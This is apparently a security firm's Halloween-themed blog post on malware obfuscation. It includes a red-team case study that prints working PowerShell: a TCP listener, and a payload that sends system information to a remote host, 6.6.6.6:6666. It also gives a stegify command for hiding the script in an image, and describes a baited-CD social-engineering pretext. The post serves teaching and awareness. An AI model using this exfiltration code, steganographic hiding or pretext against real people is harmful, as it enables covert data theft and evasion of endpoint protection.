TL;DR:
- Intro to malware
- The art of disguise – learn about how malware hides itself
- Ready to look at some real malware? Don’t be a scaredy cat!
- ♫ Who you gonna call? Us, of course.
Ghostly greetings one and all. On Halloween night, children the world over dress up in scary costumes and prowl from house to house, asking wary residents for treats. This is known as “Trick-or-Treating”. The most interesting part is that the word “trick” is used to imply a “threat” of mischief the children will perform on the residents or their home if no treat is handed over.
As we will shortly see, costumes are not just for kids or adults! Software can don a disguise as well, and in contrast to the traditional Halloween “trick or treat” declaration, it wont give you a head’s up as to what’s about to happen if you don’t comply.
Malware for dummies
As most of you are aware, some software packages are assembled to cause great damage to unsuspecting users. These are known as malware. Now, malware can be categorized into several types: viruses, worms, Trojan horses, ransomware, extortionware, logic bombs, spyware… the list goes on and on.
We won’t get into every type of malware in this article. Our takeaway here is beware –
“The devil has many faces”
Vampire, Ghost or a Backdoor?
In this section let’s take a look at the different disguises malware adopts and the various methods of obfuscation malware makes use of. But first, you may be asking yourself, why does malware need to disguise itself in the first place? The answer is quite simple! In order to cloak its behavioral patterns and help it bypass detection by the firewalls, anti-malware countermeasures, intrusion detections systems and more that would expose its dastardly intentions and shut it down.
So without further ado let’s explore somemost methods of obfuscation:
- Dead-code💀insertion – dead code is useless code spun into the application that disguises its flow and makes it more entangled while also increasing its overall size. It doesn’t, however, alter its behavior.
- Command changes – an attacker can use alternative instructions for the procedures implemented in the code. This does not change the behavior of the program either, only the appearance of the code behind it.
- ROT13 cipher – a cipher that replaces a given letter with the 13th letter that follows it alphabetically. It does not have any effect on numbers. This is easy to decipher since you just need to apply ROT13 a second time on the ciphered data. An attacker can use this encoding method in order to obfuscate data from counter-measures seeking certain commands or signatures.
- XOR (Exclusive or) cipher – XOR is first of all a logical operation, but it can be used as a cipher. It operates by outputting “TRUE” only in situations in which two inputs differ. An attacker can use this operation in order to encrypt the malicious code, by choosing a key, and apply the XOR using the key. The code can be decrypted using the same key.
- Base64 (radix-64) encoding – the idea of Base64 is to encode data in plain text, hence it is considered to be a binary to ASCII encoding scheme. It uses 64 characters in the process. It can usually be identified since the last character in the string is a “=” (padding).
- Packers -most of the time, this refers to a compression of the source code. This of course also shrinks the size of the code. Packers can unpack themselves automatically at the time of execution, with no user intervention.
- Steganography– This method is used to conceal one file in another. In terms of security, for example, a malicious file can be stored inside an image file. The photo is used as a “carrier” for dangerous data. Malware that uses this method is called Stegomalware.
And for my next trick…
So now it’s time to demonstrate a practical scenario that uses malware obfuscation, in this case using Steganography.
OP Innovate Red Team was engaged by an organization to conduct a Red Team exercise.
The challenge: Steal sensitive corporate data.
To do this we’d need to bypass the corporate security controls, take over the internal network domain, and somehow exfiltrate the data undetected by data leakage protection (DLP) measures. Our recon showed that the organization’s perimeter is protected by firewalls and that endpoint computers inside have endpoint protection including antivirus software and other anti-malware countermeasures installed. So we decided to obfuscate the malicious file using multiple methods.
For demonstration purposes we will focus on one particular obfuscated malware – a StegoMalware.
This malware works by grabbing sensitive information from inside the system and sending it back to the attacker.
- First, the attacker collects intelligence. Turns out that the HR manager’s son has broken his hand. Photos on social media show the poor fellow in a cast.
- Next, the attacker weaponizes a CD containing the malicious payload and spins up a server that listens for incoming connections.
" ___________ _____ _ | _ | ___ |_ _| | | | | | | |_/ / | | _ __ _ __ _____ ____ _| |_ ___ | | | | __/ | || '_ | '_ / _ / / _` | __/ _ _/ / | _| || | | | | | | (_) V / (_| | || __/ ___/_| ___/_| |_|_| |_|___/ _/ __,_|_____| " #listening server $port=6666 $IPEndPoint=New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any,$port) $TcpListener=New-Object System.Net.Sockets.TcpListener $IPEndPoint $TcpListener.Start() $AcceptTcpClient=$TcpListener.AcceptTcpClient() $GetStream=$AcceptTcpClient.GetStream() $StreamReader=New-Object System.IO.StreamReader $GetStream $StreamReader.ReadLine() $StreamReader.Dispose() $GetStream.Dispose() $AcceptTcpClient.Dispose()
$TcpListener.Stop()
" ___________ _____ _
| _ | ___ |_ _| | |
| | | | |_/ / | | _ __ _ __ _____ ____ _| |_ ___
| | | | __/ | || '_ | '_ / _ / / _` | __/ _
_/ / | _| || | | | | | | (_) V / (_| | || __/
___/_| ___/_| |_|_| |_|___/ _/ __,_|_____|
"
#attacker’s payload
function Get-SystemInfo
{
param($ComputerName = $env:ComputerName)
$header = 'Hostname','OSName','OSVersion','OSManufacturer','OSConfig','Buildtype', 'RegisteredOwner','RegisteredOrganization','ProductID','InstallDate', 'StartTime','Manufacturer','Model','Type','Processor','BIOSVersion', 'WindowsFolder' ,'SystemFolder','StartDevice','Culture', 'UICulture', 'TimeZone','PhysicalMemory', 'AvailablePhysicalMemory' , 'MaxVirtualMemory', 'AvailableVirtualMemory','UsedVirtualMemory','PagingFile','Domain' ,'LogonServer','Hotfix','NetworkAdapter'
systeminfo.exe /FO CSV /S $ComputerName |
Select-Object -Skip 1 |
ConvertFrom-CSV -Header $header
}
$TcpClient = New-Object System.Net.Sockets.TcpClient
$TcpClient.Connect("6.6.6.6",6666)
$GetStream = $TcpClient.GetStream()
$StreamWriter = New-Object System.IO.StreamWriter $GetStream
$positions = Get-SystemInfo
$StreamWriter.WriteLine($positions)
$StreamWriter.Dispose()
$GetStream.Dispose()
$TcpClient.Dispose()
- Next, the attacker has the CD delivered to the HR office, FAO the HR manager. The CD appears to come from her local X-ray lab.
- The HR manager pops the CD into her computer and tries to view the contents.
- The HR manager receives an alert from her computer’s endpoint protection and the malicious files are blocked.
The challenge: The malware has been successfully delivered to the HR manager but the anti-malware countermeasures prevent it from running.
The sleight of hand – it’s all in the wrist!
The bypass: Using some form of obfuscation in order to cloak the malware.
- The CD contains two artifacts: The X-ray image that has been altered using steganography to contain a malicious payload, and an executable file masquerading as a special image viewer. The CD has an instruction label on it – “To view the X-ray image file, please run the built-in image viewer”.
- When the executable file is clicked, it simply extracts a PowerShell script that has been hidden in the image using an open source steganography tool called stegify. This tool uses the LSB (least significant bit) technique to obfuscate the malicious file inside the photo. The result? The human eye cannot detect any visual difference between the original image and the one that contains the script.
stegify encode --carrier .pic_original.png --data .systemInfo.ps1 --result pic_malicious.png
- The image viewer is also opened in order to display the image and mask the evidence of the malicious activity.
One of these images is malicious. Click on the one you think contains malicious code and contact us for more details!
- Finally the malicious payload is executed and the sensitive data is exfiltrated to the attacker’s remote server.
Takeaways
- Code obfuscation can be used for mitigation – obfuscation is not always used with bad intentions in mind. This process can also serve as a mitigation tool that helps to mitigate the risk from decompilers and frustrate hackers whose intent is to reverse engineer a program, since the decompiled code is rendered unintelligible.
- Files are not always as they seem – as you already know, files can contain malicious code yet still present as harmless to the naked eye.
- Heuristic scanning, advanced solution – This technique is one step ahead of signature-based solutions. It can raise a flag when encountering the suspicious behavior pattern of a program. This technique is pretty useful for identifying new malware and revealing encoded/encrypted malware.
- Social awareness – most humans have a deeply curious and trusting nature that sometimes has negative effects on them and/or the security posture of their sensitive information.
About Us
OP Innovate was established in 2014 to defend global enterprises from the increasing challenges of organizational cybersecurity. Our team has unmatched expertise in cyber research, penetration testing, incident response, training and forensics. Our team members are exposed to cutting-edge responses to today’s most critical cybersecurity concerns allowing us and our partners to remain ahead of the bad guys.
Written by Dan Shallom, Cyber security researcher | Certified Ethical Hacker (CEH).